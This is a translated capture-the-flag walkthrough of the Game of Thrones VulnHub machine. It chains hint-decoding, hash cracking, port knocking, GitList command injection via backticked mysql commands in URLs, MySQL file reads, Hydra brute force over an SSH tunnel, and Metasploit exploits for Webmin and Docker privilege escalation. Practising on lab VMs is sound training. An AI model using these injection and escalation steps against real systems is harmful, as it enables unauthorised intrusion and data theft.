Target machine description:
Game of Thrones Hacking CTF
This is a challenge-game to measure your hacking skills. Set in Game of Thrones fantasy world.
Goal:
Get the 7 kingdom flags and the 4 extra content flags (3 secret flags + final battle flag). There are 11 in total.
Rules/guidelines to play:
- Start your conquer of the seven kingdoms
- You'll need hacking skills, no Game of Thrones knowledge is required. But if you play, it may contain spoilers of the TV series
- Difficulty of the CTF: Medium-High
- Don't forget to take your map (try to find it). It will guide you about the natural flag order to follow over the kingdoms
- Listen CAREFULLY to the hints. If you are stuck, read the hints again!
- Powerful fail2ban spells were cast everywhere. Bruteforce is not an option for this CTF (2 minutes ban penalty)
- The flags are 32 chars strings. Keep 'em all! You'll need them
Requirements/starting guide:
- Import the Linux based CTF challenge virtual machine (OVA file)
- OVA file is compatible with Oracle Virtualbox and Vmware
- The challenge vm needs 1 CPU and 1512 MB RAM to work properly
- The challenge vm has its network configured by default as bridge. It will take an IP from the DHCP of your network
Downloading challenge CTF vm:
- Download Link 1 (Mega)
- Mirror 1 (Dropbox)
Troubleshooting
- Vmware:
  - If you get a warning/error importing the machine, press "Retry" and it will be imported flawlessly
- Oracle Virtualbox:
  - It's recommended to use the "Import Appliance" menu option instead of double-clicking the OVA file
  - If you get an error regarding the network, just select your network interface
Good luck, the old gods and the new will protect you!
Penetrating the target machine:
This time I use Parrot Linux plus Windows 10 as the attacking machines; the attacker's IP address is 192.168.0.112.
The target and the attacker are on the same subnet, so we first use nmap to find the target's IP address:
Because I opened the target in VMware, the target's IP turns out to be 192.168.0.161.
Then we run a deeper nmap scan against that IP:
We can see the target has quite a few ports open: 21, 22, 53, 80, 143, 3306, 5432, 10000.
Let's try visiting the target's home page:
First we view the page source:
...there is a pile of things that look valuable... after running them through Baidu Translate... shit.. let's keep looking:
We try dirb from Kali to brute-force the target's directories:
It finds quite a few directories:
- http://192.168.0.161/css/
- http://192.168.0.161/favicon.ico
- http://192.168.0.161/imgs/
- http://192.168.0.161/index.php
- http://192.168.0.161/robots.txt
- http://192.168.0.161/sitemap.xml
And a rather odd one:
- http://192.168.0.161/h/i/d/d/e/n/index.php
Let's look at the sensitive robots.txt first:
It contains three directories: /the-tree/, /secret-island/, /direct-access-to-kings-landing/,
and a User-agent line: Three-eyed-raven
Let's visit those three directories in turn:
We click Map:
Let's study this map carefully:
It records the key points and goals of this game: besides the usual 7 flags to obtain, there are 3 secret flags,
and the final battle is over SSH...
We visit the next directory:
We view the source to see whether there is any useful information:
There is this sentence:
You mUSt changE your own shape and foRm if you wAnt to GEt the right aNswer from the Three-eyed raven" - Written on the tree by somebody
Seeing Three-eyed-raven I immediately thought of the User-agent in robots.txt; the hint also says we need to change ourselves (note the capital letters in the sentence),
so maybe we should capture the request with Burp and replace the User-Agent header. Let's try:
The content is as follows:
<!--
"I will give you three hints, I can see the future so listen carefully" - The three-eyed raven Bran Stark
"To enter in Dorne you must identify as oberynmartell. You still should find the password"
"3487 64535 12345 . Remember these numbers, you'll need to use them with POLITE people you'll know when to use them"
"The savages never crossed the wall. So you must look for them before crossing it"
-->
...I suddenly have no idea; these hints will probably be needed later. We visit the third directory:
View the source:
The content is as follows: "I've heard the savages usually play music. They are not as wild as one can expect, are they?" - Sansa Stark
...still no clue. We brute-forced so many directories, let's visit a few sensitive ones:
Music? Savages can understand it? Also considering the three-eyed raven's first instruction, let's download the music and inspect the file's metadata with exiftool:
https://sno.phy.queensu.ca/~phil/exiftool/
We can see: Savages secret flag: 8bf8854bebe108183caeb845c7676ae4
We got the first hidden flag!!! Let's look for other pages.
We suddenly notice there is also a raven.php; let's try visiting it:
Again we need to view the source:
Translation of the hint: To cross the wall, mcrypt's spell will help you. Whoever you are, only the key can open the secret door.
...We continue visiting directories:
View the source:
The content is as follows:
<!--
"My little birds are everywhere. To enter in Dorne you must say: A_verySmallManCanCastAVeryLargeShad0w . Now, you owe me" - Lord (The Spider) Varys
"Powerful docker spells were cast over all kingdoms. We must be careful! You can't travel directly from one to another... usually. That's what the Lord of Light
has shown me" - The Red Woman Melisandre
-->
We got a password: A_verySmallManCanCastAVeryLargeShad0w, which should get us into Dorne. I recall the hint said
"To enter in Dorne you must identify as oberynmartell. You still should find the password", so oberynmartell is the username; the map also hints at this:
I think we can try logging into FTP as oberynmartell with that password:
We can see the first flag has appeared, though it looks like an MD5 hash; we try to decode it:
In the directory we find two files:
We download them:
We open the first file, problems_in_the_north.txt:
The content is as follows:
"There are problems in the north. We must travel quickly. Once there we must defend the wall" - Jon Snow
"What kind of magic is this?!? I never saw before this kind of papirus. Let's check it carefully" - Maester Aemon Targaryen
md5(md5($s).$p)
nobody:6000e084bf18c302eae4559d48cb520c$2hY68a
Obviously we need to use the method above to crack the password below.
The hashing scheme is: md5(md5($salt).$pass)
6000e084bf18c302eae4559d48cb520c$2hY68a
According to the hashcat official wiki, this hash type is only supported in hashcat-legacy.
At the same time, to match the format the tool expects, the "$" in the hash has to be changed to ":":
6000e084bf18c302eae4559d48cb520c:2hY68a
Save the hash above in pass.txt.
The GitHub address is: https://github.com/hashcat/hashcat-legacy
But as we can see, the latest hashcat has dropped cracking for this hash type, so we have to find an older version:
https://hashcat.net/files_legacy/hashcat-2.00.7z
We look up the mode number for md5(md5($salt).$pass):
Combined with the rockyou.txt wordlist that ships with Kali, the hash is cracked successfully:
Cracked; the password is: stark
We also obtained an encrypted file, the-wall.txt.nc. That reminds me of another hint:
To cross the wall, mcrypt's spell will help you. Whoever you are, only the key can open the secret door.
It seems we can use mcrypt to cross the wall, i.e. decrypt the file, with stark as the password:
OK! Decryption succeeded:
The content is as follows:
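As an added example (not code from the page, hashcat or the CTF), here is the md5(md5($salt).$pass) construction in Python, together with the "$" to ":" format conversion described above, used to verify a candidate against the hash line from problems_in_the_north.txt. The short wordlist is constructed; it illustrates why a salt that is stored next to the digest does nothing against a dictionary word.

```python
import hashlib

# Hash line exactly as found in problems_in_the_north.txt on the page ("hash$salt" form).
PAGE_HASH_LINE = "6000e084bf18c302eae4559d48cb520c$2hY68a"

# Constructed stand-in for rockyou.txt.
WORDLIST = ["password", "winter", "stark", "lannister"]

def md5_hex(data):
    """Lowercase hex MD5 digest of a text string."""
    return hashlib.md5(data.encode()).hexdigest()

def md5_md5salt_pass(salt, password):
    """md5(md5($salt).$pass): the inner md5 is the 32-char hex digest of the salt,
    concatenated as text with the password, then hashed again."""
    return md5_hex(md5_hex(salt) + password)

def to_hashcat_format(line):
    """Convert 'hash$salt' (as in the file) to the 'hash:salt' form the tool expects."""
    digest, salt = line.split("$", 1)
    return f"{digest}:{salt}"

def parse(line):
    """Split a converted line into (digest, salt)."""
    digest, salt = to_hashcat_format(line).split(":", 1)
    return digest.lower(), salt

def check_candidate(line, candidate):
    """True if the candidate password reproduces the stored digest under this scheme."""
    digest, salt = parse(line)
    return md5_md5salt_pass(salt, candidate) == digest

def find_matching_word(line, words):
    """Return the first word in the list that matches, or None."""
    for word in words:
        if check_candidate(line, word):
            return word
    return None

if __name__ == "__main__":
    print(to_hashcat_format(PAGE_HASH_LINE))
    print("match:", find_matching_word(PAGE_HASH_LINE, WORDLIST))
```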
"We defended the wall. Thanks for your help. Now you can go to recover Winterfell" - Jeor Mormont, Lord Commander of the Night's Watch
"I'll write on your map this route to get faster to Winterfell. Someday I'll be a great maester" - Samwell Tarly
http://winterfell.7kingdoms.ctf/------W1nt3rf3ll------
Enter using this user/pass combination:
User: jonsnow
Pass: Ha1lt0th3k1ng1nth3n0rth!!!
There is a URL inside; we try visiting it directly:
We add this hostname to /etc/hosts and visit again:
We log in with the username and password found above and see a page with two images, Jon Snow and the banner of the North:
View the source for hints:
The content is as follows:
<!--
Welcome to Winterfell
You conquered the Kingdom of the North. This is your second kingdom flag!
639bae9ac6b3e1a84cebb7b403297b79
"We must do something here before travelling to Iron Islands, my lady" - Podrick Payne
"Yeah, I can feel the magic on that shield. Swords are no more use here" - Brienne Tarth
-->
We got the second flag! And according to the hint, the emblem on this shield is the way forward, so we download the image:
Opening it as a text file, this passage appears at the end:
The content is as follows:
Timef0rconqu3rs TeXT should be asked to enter into the Iron Islands fortress" - Theon Greyjoy
It seems the key to the next step is there; combine it with the map's hint about the third flag:
The third target is on DNS, and the hint above suggests a TXT record may contain something, so we can use nslookup to inspect the DNS records.
nslookup's simplest use is resolving a domain name to an IP address; it can query A, MX, NS, CNAME and TXT records.
The format is: nslookup -q=txt <domain> <DNS server IP>
So we build a command to look at the target's DNS TXT record and get the third flag:
The content is as follows:
Server: 192.168.0.161
Address: 192.168.0.161#53
Timef0rconqu3rs.7kingdoms.ctf text = "You conquered Iron Islands kingdom flag: 5e93de3efa544e85dcd6311732d28f95. Now you should go to Stormlands at http://stormlands.7kingdoms.ctf:10000 . Enter using this user/pass combination: aryastark/N3ddl3_1s_a_g00d_sword#!"
We got the third flag!
Another URL hint; again we add it to /etc/hosts and try port 10000:
Logging in with the username and password, on the main page we find this flag hint:
The source reveals nothing, so we click File Manager:
The browser also needs Java support... it is recommended to do this in IE... I won't do it here.
Reference: http://www.freebuf.com/articles/web/175048.html
Another approach:
From the hints on the map we find:
the Stormlands interface is Webmin.
Once connected, it shows the version number: Webmin 1.590.
I searched to see whether the search field had any flaw, with no result. This version is known to be vulnerable (CVE-2012-2982), and Metasploit provides an exploit module.
The content is as follows:
Congratulations!you conquered Stormlands.This is your flag:8fc42c6ddf9966db3b09e84365034357
Now prepare yourself for the next challenge!
The credntials to access to the Mountain and the Vale kingdom are:
user/pass: robinarryn/cr0wn_f0r_a_King-_
db: mountainandthevale
pgAdmin magic will notwork. Command line should be used on that kingdom - Talisa Maegyr
We got the fourth flag! The hint mentions a username and password, plus a database name.
Let's check the map's hint:
...a PostgreSQL database; the nmap scan already showed PostgreSQL running on port 5432 of the target,
so this hint wants us to access the database using the credentials from the file above. Let's try to connect:
(common PostgreSQL commands: http://www.javashuo.com/article/p-oipzmkdb-hb.html)
First we look at the table structure:
There is a flag table; we open it and find a long base64 string:
We try to decode it:
The content is as follows:
Nice! you conquered the Kingdom of the Mountain and the Vale. This is your flag: bb3aec0fdcdbc2974890f805c585d432. Next stop the Kingdom of the Reach. You can identify yourself with this user/pass combination: olennatyrell@7kingdoms.ctf/H1gh.Gard3n.powah , but first you must be able to open the gates
We got the fifth flag! Let's look at other useful tables in the PostgreSQL database:
select * from aryas_kill_list;
Lots of names; they may come in handy.
select * from eyrie;
select * from popular_wisdom_book;
select * from braavos_book;
The content is as follows:
1 | City of Braavos is a very particular place. It is not so far from here.
2 | "There is only one god, and his name is Death. And there is only one thing we say to Death: Not today" - Syrio Forel
3 | Braavos have a lot of curious buildings. The Iron Bank of Braavos, The House of Black and White, The Titan of Braavos, etc.
4 | "A man teaches a girl. -Valar Dohaeris- All men must serve. Faceless Men most of all" - Jaqen H'ghar
6 | "A girl has no name" - Arya Stark
7 | City of Braavos is ruled by the Sealord, an elected position.
8 | "That man's life was not yours to take. A girl stole from the Many-Faced God. Now a debt is owed" - Jaqen H'ghar
9 | Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc
Entry 9 doesn't look like English; it looks like a rot16 encoding. We try decoding it with https://www.rot13.com/:
The content is as follows:
The many-faced god wants you to change your face. He wants you to identify as one of your kill list. Select it based on this book's lost page number. The database to connect will be braavos and your password will be: ValarMorghulis
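Added example (not from the page or rot13.com): a Caesar-shift decoder that recovers entry 9 by trying all 26 shifts and scoring each candidate by how many common English words it contains. The common-word list is an assumption of the example; shift 16 is the one that yields the text above.

```python
import string

# Entry 9 of braavos_book, copied from the query output on the page.
CIPHERTEXT = ("Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. "
              "Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. "
              "Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. "
              "Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc")

# Assumed scoring vocabulary: a few very common English words.
COMMON_WORDS = {"the", "and", "you", "to", "of", "be", "will", "your", "god", "is", "a", "it", "on"}

def rot(text, shift):
    """Shift every ASCII letter by `shift` positions (mod 26); other characters are kept."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)

def score(text):
    """Count words of the candidate plaintext that appear in COMMON_WORDS."""
    cleaned = text.lower().translate(str.maketrans("", "", string.punctuation))
    return sum(1 for word in cleaned.split() if word in COMMON_WORDS)

def crack_rot(ciphertext):
    """Try all 26 shifts and return (best_shift, plaintext) by common-word score."""
    best = max(range(26), key=lambda s: score(rot(ciphertext, s)))
    return best, rot(ciphertext, best)

if __name__ == "__main__":
    shift, plaintext = crack_rot(CIPHERTEXT)
    print(f"shift {shift}: {plaintext}")
```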
I suddenly remember our hidden flag.
Now we have the database and the password; we still need to enumerate usernames (the kill list from above), and TheRedWomanMelisandre turns out to be the username.
Let's log into the database:
We try to find useful information:
select * from temple_of_the_faceless_men;
We got the second hidden flag: 3f82c41a70a8b0cfec9052252d9fd721
text: Congratulations. You've found the secret flag at City of Braavos. You've served well to the Many-Faced God.
According to the fifth flag's hint we should now head to the Kingdom of the Reach, and we already know the sixth flag's
username and password: olennatyrell@7kingdoms.ctf/H1gh.Gard3n.powah
Let's see what the map hints:
From the nmap results, IMAP runs on port 143, but this port is not open,
and there was an earlier hint: "3487 64535 12345. Remember these numbers, you'll need to use them with POLITE people; you'll know when to use them"
and the popular_wisdom_book table in the PostgreSQL database had these words:
OK, we need to knock. This is a security mechanism, a port knocking service (knockd); let's look up what it is.
This service hides the services a system exposes by dynamically adding iptables rules, and a custom sequence of port numbers is used to "knock".
Only after this method makes the system open the required service port can it be accessed from outside.
When not in use, a custom sequence is used again to "close the door", closing the port so it no longer listens externally. This further improves the security of the service and the system.
Port knocking is a method of opening a previously closed port from outside through connection attempts. Once the correct sequence of connection attempts is received, the firewall dynamically opens specific ports to the host that made the attempts.
The main purpose of port knocking is to prevent attackers from attacking the host by way of port scanning.
Port knocking resembles a secret handshake protocol; in its most basic form a particular sequence of UDP or TCP packets is sent. When the daemon running on the host captures the packets and the sequence is correct, it opens the corresponding port, or the firewall lets the client through.
Since Internet-facing Linux servers control access by restricting IP addresses, port knocking can be used to have the firewall control which IP addresses may access.
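As an added illustration of the mechanism just described (not code from the page or from knockd itself), here is a minimal model of the matching logic a knockd-style daemon applies: per source IP it tracks progress through the sequence 3487, 64535, 12345 from the hint and grants access to port 143 only on a complete, in-order match within a timeout. The timeout value and the (src_ip, dst_port, timestamp) event format are assumptions of the example; the events are constructed.

```python
KNOCK_SEQUENCE = (3487, 64535, 12345)   # sequence from the three-eyed raven's hint
PROTECTED_PORT = 143                    # IMAP port the knock is meant to open
SEQ_TIMEOUT = 10.0                      # assumed: seconds allowed between two knocks

class KnockTracker:
    """Tracks knock progress per source IP and records which IPs have been admitted."""

    def __init__(self, sequence=KNOCK_SEQUENCE, timeout=SEQ_TIMEOUT):
        self.sequence = sequence
        self.timeout = timeout
        self.progress = {}    # src_ip -> (index of next expected knock, time of last knock)
        self.opened = set()   # source IPs currently allowed to reach PROTECTED_PORT

    def observe(self, src_ip, dst_port, now):
        """Feed one connection attempt to a closed port (as the firewall log would show)."""
        idx, last = self.progress.get(src_ip, (0, now))
        if now - last > self.timeout:
            idx = 0                       # too slow: the sequence starts over
        if dst_port == self.sequence[idx]:
            idx += 1                      # expected knock, advance
        else:
            # any wrong port resets; it may itself be the first knock of a new attempt
            idx = 1 if dst_port == self.sequence[0] else 0
        if idx == len(self.sequence):
            self.opened.add(src_ip)       # full in-order match: admit this IP
            idx = 0
        self.progress[src_ip] = (idx, now)

    def allows(self, src_ip, dst_port):
        """Would the firewall pass this connection? Only the protected port is gated."""
        return dst_port != PROTECTED_PORT or src_ip in self.opened

def replay(events):
    """Run (src_ip, dst_port, t) events through a fresh tracker; return admitted IPs."""
    tracker = KnockTracker()
    for src_ip, dst_port, t in events:
        tracker.observe(src_ip, dst_port, t)
    return tracker.opened

if __name__ == "__main__":
    # Constructed events: one correct knock, one port scan hitting the same ports in numeric order.
    correct = [("10.0.0.5", 3487, 0.0), ("10.0.0.5", 64535, 1.0), ("10.0.0.5", 12345, 2.0)]
    scan = [("10.0.0.6", 3487, 0.0), ("10.0.0.6", 12345, 1.0), ("10.0.0.6", 64535, 2.0)]
    print("admitted:", replay(correct + scan))   # only 10.0.0.5
```

A sequential port scan touches the three ports in ascending order, which is why the scanner in the constructed events is never admitted.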
Now we use the numbers found in the hint earlier, 3487 64535 12345, to try to get the target to open port 143, using knock:
We check whether port 143 is open now:
Connect with netcat, using the username and password found earlier:
nc 192.168.0.161 143
The mail content obtained is as follows:
Congratulations!!
You conquered the Kingdom of the Reach. This is the flag: aee750c2009723355e2ac57564f9c3db
Now you can auth on next Kingdom (The Rock, port 1337) using this user/pass combination:
User: TywinLannister
Pass: LannisterN3verDie!
“The things I do for love…” – Jaime (Kingslayer) Lannister
We already have the sixth flag! And in the hint we get the username and password to log into port 1337.
We try to log in:
Once in we find a GitList site; browsing around, we find a hint:
The content is as follows:
There is a note under the bed. Somebody put it there. It says:
2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874
"The main gates of King's Landing are permanently closed by Queen's order. You must search for another entrance"
- An anonymous friend
There is a hex-encoded string; we try decoding it:
/home/tyrionlannister/checkpoint.txt looks like a useful text file, but we cannot get at it.
A Google search shows GitList has a command execution vulnerability; details:
http://hatriot.github.io/blog/2014/06/29/gitlist-rce/
The vulnerability is still present here, great! We try to read the txt file directly:
The content is as follows:
Welcome to: (ASCII-art banner)
You are very close to get the flag. Is not here, it's at King's Landing. We must travel there from here!
The credentials to access to King's Landing are:
user/pass: cerseilannister/_g0dsHaveNoMercy_
db: kingslanding
"Chaos isn't a pit. Chaos is a ladder" - Petyr (Littlefinger) Baelish
In any case we have found the username and password for King's Landing: cerseilannister/_g0dsHaveNoMercy_, db: kingslanding
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="show tables;" `
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="SELECT * from iron_throne;" `
This -..-. . - -.-. -..-. -- -.-- ... --.- .-.. -..-. ..-. .-.. .- --. is obviously Morse code; decoding it online gives the path /etc/mysql/flag:
We have a trace of the flag!
But when we try to view this file we find it does not exist. What is going on?
After the Morse code there is one more hint, telling us we have privileges here; let's see what they are:
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="show grants;" `
We can see FILE, GRANT, SELECT, INSERT and CREATE. My guess is that we need to use these privileges to load the flag's contents into a new table so we can read it.
Three commands in a row:
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="CREATE TABLE test (flag TEXT);" `
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="LOAD data INFILE '/etc/mysql/flag' INTO TABLE test;" `
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="select * from test;" `
The content is as follows:
Congratulations. You conquered the last kingdom flag. This is your flag: c8d46d341bea4fd5bff866a65ff8aea9
Now you must find the Dragonglass mine to forge stronger weapons.
Ssh user-pass: daenerystargaryen-.Dracarys4thewin.
"All men must die, but we are not men" - Daenerys Stormborn of the House Targaryen, First of Her Name, the Unburnt, Queen of the Andals and the First Men, Khaleesi of the Great Grass Sea, Breaker of Chains, and Mother of Dragons
We got the seventh flag! But the hint tells us it's not over yet; we need to log in over SSH:
User: daenerystargaryen
Pass: .Dracarys4thewin.
Login successful! And we find two files in /home/daenerystargaryen: checkpoint.txt and digger.txt
We look at each of them:
The content is as follows:
"Dragonglass. Frozen fire, in the tongue of old Valyria. Small wonder it is anathema to these cold children of the Other" - The Red Woman Melisandre
"Large amounts of Dragonglass can be found on Dragonglass mine (172.25.0.2). The mine can be accessed only from here. We are very close... Fail2ban magic is not present there, maybe we can reach the 'root' of the problem pivoting from outside to use this digger" - Samwell Tarly
"The White Walkers don't care if a man's free folk or crow. We're all the same to them, meat for their army. But together we can beat them" - Jon Snow
The hint says this is the only way into 172.25.0.2 and that fail2ban is probably not present there, which gives us the possibility of brute-forcing root; there is also the digger.txt wordlist. We download it with scp and brute-force with Hydra:
scp daenerystargaryen@192.168.0.161:/home/daenerystargaryen/digger.txt ./digger.txt
We use an SSH local port forward to bind it to our port 22222:
ssh daenerystargaryen@192.168.0.161 -L 12345:172.25.0.2:22 -N
Now I use Hydra over SSH with root as the username and the digger.txt file as the password list:
The root password cracked is: Dr4g0nGl4ss!
We use this password to log in via SSH, connecting to localhost since we have already set up the SSH local tunnel:
We look at the flag:
The content is as follows:
Congratulations.
You've found the secret flag of Dragonglass mine. This is your flag: a8db1d82db78ed452ba0882fb9554fc9
Now you have the Dragonglass weapons to fight against the White Walkers.
Host's ssh:
branstark/Th3_Thr33_Ey3d_Raven
"The time has come" - The Three Eyed Raven
We got the third hidden flag! But this isn't the end yet; we also got the host's SSH credentials:
branstark/Th3_Thr33_Ey3d_Raven
We connect via SSH again:
We find this server is Docker-based; a search turns up:
https://www.exploit-db.com/exploits/40394/
Docker has a local privilege escalation vulnerability; we use Metasploit to connect:
We directly use the Docker local privilege escalation module in msf, and now we find we already have root.
We download the final_battle file from /root to our machine and open it:
Inside there is a flag.txt, but a password is needed to extract it. We look at checkpoint.txt for useful information:
The content is as follows:
To defeat White Walkers you need the help of the Savages, the Many-Faced God skill learned at Braavos and the Dragonglass weapons
Some hints:
type of file = ???
pass = ???
useful-pseudo-code-on-invented-language = concat(substr(secret_flag1, strlen(secret_flag1) - 10, strlen(secret_flag1)), substr(secret_flag2, strlen(secret_flag2) - 10, strlen(secret_flag2)), substr(secret_flag3, strlen(secret_flag3) - 10, strlen(secret_flag3)))
"Hodor... Hodor!!" - Hodor
Three secret flags are needed:
secret flag1: 8bf8854bebe108183caeb845c7676ae4
secret flag2: 3f82c41a70a8b0cfec9052252d9fd721
secret flag3: a8db1d82db78ed452ba0882fb9554fc9
The password formula is:
concat(
substr(secret_flag1, strlen(secret_flag1) - 10, strlen(secret_flag1)),
substr(secret_flag2, strlen(secret_flag2) - 10, strlen(secret_flag2)),
substr(secret_flag3, strlen(secret_flag3) - 10, strlen(secret_flag3))
)
Write a quick bit of Python and run it:
flag1 = "8bf8854bebe108183caeb845c7676ae4"
flag2 = "3f82c41a70a8b0cfec9052252d9fd721"
flag3 = "a8db1d82db78ed452ba0882fb9554fc9"
# take the last 10 characters of each secret flag and join them
password = flag1[len(flag1)-10:len(flag1)] + flag2[len(flag2)-10:len(flag2)] + flag3[len(flag3)-10:len(flag3)]
print("password:" + password)
We run it:
and get the password: 45c7676ae4252d9fd7212fb9554fc9
We use it to extract the final_battle file:
We successfully got the final flag!!!!
Lessons learned:
1. A flag hidden in a music file, analysed with exiftool; you must be careful.
2. For cracking you can use John the Ripper, but my john always reported "No password hashes loaded (see FAQ)";
I consulted https://www.waitalone.cn/john-no-password-hashes-loaded.html and still could not solve it...
3. The Webmin version vulnerability; some pages now use Java, and a browser without the Java plugin may render the page incompletely.
4. Basic PostgreSQL syntax.
5. Port knocking, nowadays mostly knockd (apt-get install knockd); nc to port 143 (IMAP) to check mail.
6. The command injection vulnerability in old GitList versions, which can be reproduced locally.
7. Using a local SSH tunnel to bind a port.
8. The local privilege escalation vulnerability in old Docker versions, and exploitation with msf.
9. Recommended: download the VM image from VulnHub and practise locally; finishing it was really tiring.
References:
http://www.freebuf.com/articles/web/177562.html